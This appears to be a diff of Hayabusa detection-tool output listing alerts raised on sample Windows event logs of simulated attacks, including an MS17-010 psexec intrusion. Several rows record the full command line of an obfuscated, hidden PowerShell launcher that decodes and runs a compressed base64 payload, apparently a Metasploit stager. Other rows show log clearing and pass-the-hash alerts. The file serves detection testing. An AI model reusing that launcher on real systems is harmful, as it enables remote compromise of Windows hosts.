+2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x74872,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
